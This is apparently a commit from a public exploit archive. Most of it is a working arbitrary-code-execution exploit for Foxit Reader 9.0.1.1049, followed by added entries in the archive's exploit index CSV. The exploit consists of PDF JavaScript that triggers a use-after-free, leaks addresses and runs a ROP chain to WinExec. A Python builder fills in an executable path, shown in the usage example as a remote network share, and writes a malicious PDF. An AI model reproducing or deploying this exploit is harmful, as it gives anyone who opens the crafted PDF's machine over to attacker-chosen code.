for(var i = 0; i < size; i++){
arr[i] = this.addAnnot({type: "Text"});;
if (typeof arr[i] == "object"){
arr[i].destroy();
}
}
}
function gc() {
const maxMallocBytes = 128 * 0x100000;
for (var i = 0; i < 3; i++) {
var x = new ArrayBuffer(maxMallocBytes);
}
}
function alloc_at_leak(){
for (var i = 0; i < 0x64; i++){
pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
}
}
function control_memory(){
for (var i = 0; i < 0x64; i++){
for (var j = 0; j < pwn_array[i].length; j++){
pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
}
}
}
function leak_vtable(){
var a = this.addAnnot({type: "Text"});
a.destroy();
gc();
prepare_heap(0x400);
var test = new ArrayBuffer(0x60);
var stolen = new Int32Array(test);
var leaked = stolen[0] & 0xffff0000;
foxit_base = leaked - 0x01f50000;
}
function leak_heap_chunk(){
var a = this.addAnnot({type: "Text"});
a.destroy();
prepare_heap(0x400);
var test = new ArrayBuffer(0x60);
var stolen = new Int32Array(test);
alloc_at_leak();
heap_ptr = stolen[1];
}
function reclaim(){
var arr = new Array(0x10);
for (var i = 0; i < arr.length; i++) {
arr[i] = new ArrayBuffer(0x60);
var rop = new Int32Array(arr[i]);
rop[0x00] = heap_ptr; // pointer to our stack pivot from the TypedArray leak
rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
rop[0x02] = 0x72727272; // junk
rop[0x03] = foxit_base + 0x00001450 // pop ebp; ret
rop[0x04] = 0xffffffff; // ret of WinExec
rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
rop[0x0a] = foxit_base + 0x0041c6ca; // ret
rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
//Path to executable
<PATH TO EXECUTABLE>
//End Path to executable
rop[0x17] = 0x00000000; // adios, amigo
}
}
function trigger_uaf(){
var that = this;
var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
var arr = [1];
Object.defineProperties(arr,{
"0":{
get: function () {
that.getAnnot(0, "uaf").destroy();
reclaim();
return 1;
}
}
});
a.point = arr;
}
function main(){
leak_heap_chunk();
leak_vtable();
control_memory();
trigger_uaf();
}
if (app.platform == "WIN"){
if (app.isFoxit == "Foxit Reader"){
if (app.appFoxitVersion == "9.0.1.1049"){
main();
}
}
}
)>> trailer <</Root 1 0 R>>
'''
import sys
#Enforces 2 hex char byte notation. "0" becomes "0x00"
def format_byte(b):
if (len(b) > 2) and (b[0:2] == '0x'):
b = b[2:]
if len(b) == 1:
b = '0' + b
return '0x' + b
def char2hex(c):
return format_byte(hex(ord(c)))
#Converts file path into array of eleven 32-bit hex words
def path_to_machine_code(path,little_endian = True):
print("[+] Encoding Path:",path)
#ensure length
if len(path) > 44:
print("[CRITICAL] Path length greater than 44 characters (bytes). Aborting!")
exit(-1)
#Copy path into 4 character (32 bit) words (max 11)
word_array = []
for i in range(11):
word = ''
if len(path):
word += path[0:4] if len(path) >= 4 else path
path = path[len(word):]
if len(word) < 4:
word += chr(0) * (4 - len(word))
word_array.append(word)
#Convert chars to hex values and format to "0xAABBCCDD" notation
hex_array = []
for word in word_array:
#Reverse byte order to fit little endian standard
if(little_endian): word = word[::-1]
#Write bytes to hex strings
hex_string = '0x'
for char in word:
hex_string += char2hex(char)[2:] #strip the 0x off the byte here
hex_array.append(hex_string)
return hex_array
#writes encoded path to rop array to match template
def create_rop(hex_arr, start_index = '0c'):
ord_array = []
index = int(start_index,16)
for instruction in hex_arr:
full_instruction = f"\trop[{format_byte(hex(index))}] = {instruction};"
ord_array.append(full_instruction)
index += 1
return ('\n'.join(ord_array))
if __name__ == '__main__':
if len(sys.argv) != 3:
print(f"USAGE: {sys.argv[0]} <path to executable> <pdf filename>")
print("-- EXAMPLES --")
print(f"{sys.argv[0]} \\\\192.168.0.1\\exploits\\bad.exe evil.pdf")
exit(-1)
#Parse user args
EXE_PATH = sys.argv[1]
PDF_PATH = sys.argv[2]
#Generate hex
raw_hex = path_to_machine_code(EXE_PATH)
print("[+] Machine Code:")
for hex_word in raw_hex:
print(hex_word)
ord_string = create_rop(raw_hex)
print("[+] Instructions to add:")
print(ord_string)
print("[+] Generating pdf...")
print("\t- Filling template...")
evil_pdf = PDF_TEMPLATE.replace('<PATH TO EXECUTABLE>',ord_string)
print("\t- Writing file...")
with open(PDF_PATH,'w') as fd:
fd.write(evil_pdf)
print("[+] Generated pdf:",PDF_PATH)

13
files_exploits.csv
View file

@ -6762,6 +6762,7 @@ id,file,description,date,author,type,platform,port
48732,exploits/windows/dos/48732.py,"QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)",2020-08-05,"Luis Martínez",dos,windows,
49083,exploits/windows/dos/49083.pl,"Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)",2020-11-19,"Vincent Wolterman",dos,windows,
49105,exploits/multiple/dos/49105.py,"Pure-FTPd 1.0.48 - Remote Denial of Service",2020-11-26,xynmaps,dos,multiple,
49119,exploits/linux/dos/49119.py,"libupnp 1.6.18 - Stack-based buffer overflow (DoS)",2020-11-27,"Patrik Lantz",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -11208,6 +11209,8 @@ id,file,description,date,author,type,platform,port
49089,exploits/windows/local/49089.py,"Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)",2020-11-23,"Luis Martínez",local,windows,
49100,exploits/windows/local/49100.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-11-24,MasterVlad,local,windows,
49101,exploits/windows/local/49101.txt,"Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path",2020-11-25,"Luis Sandoval",local,windows,
49108,exploits/multiple/local/49108.txt,"SAP Lumira 1.31 - Stored Cross-Site Scripting",2020-11-27,"Ilca Lucian Florin",local,multiple,
49116,exploits/windows/local/49116.py,"Foxit Reader 9.0.1.1049 - Arbitrary Code Execution",2020-11-27,CrossWire,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43332,3 +43335,13 @@ id,file,description,date,author,type,platform,port
49102,exploits/php/webapps/49102.txt,"WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting",2020-11-25,"Mayur Parmar",webapps,php,
49103,exploits/php/webapps/49103.txt,"osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting",2020-11-25,"Emre Aslan",webapps,php,
49104,exploits/windows/webapps/49104.py,"SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow",2020-11-25,"Abdessalam king",webapps,windows,
49107,exploits/php/webapps/49107.txt,"Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting",2020-11-27,"Ilca Lucian Florin",webapps,php,
49109,exploits/php/webapps/49109.txt,"WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting",2020-11-27,"Sun* Cyber Security Research Team",webapps,php,
49110,exploits/hardware/webapps/49110.py,"Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution",2020-11-27,"Emre SUREN",webapps,hardware,
49112,exploits/php/webapps/49112.py,"Laravel Administrator 4 - Unrestricted File Upload (Authenticated)",2020-11-27,"Xavi Beltran",webapps,php,
49113,exploits/multiple/webapps/49113.py,"Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF",2020-11-27,"Julien Ahrens",webapps,multiple,
49114,exploits/php/webapps/49114.txt,"Moodle 3.8 - Unrestricted File Upload",2020-11-27,"Sirwan Veisi",webapps,php,
49115,exploits/php/webapps/49115.txt,"Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)",2020-11-27,SunCSR,webapps,php,
49117,exploits/php/webapps/49117.txt,"House Rental 1.0 - 'keywords' SQL Injection",2020-11-27,boku,webapps,php,
49121,exploits/php/webapps/49121.txt,"ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting",2020-11-27,"Vyshnav nk",webapps,php,
49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php,

Can't render this file because it is too large.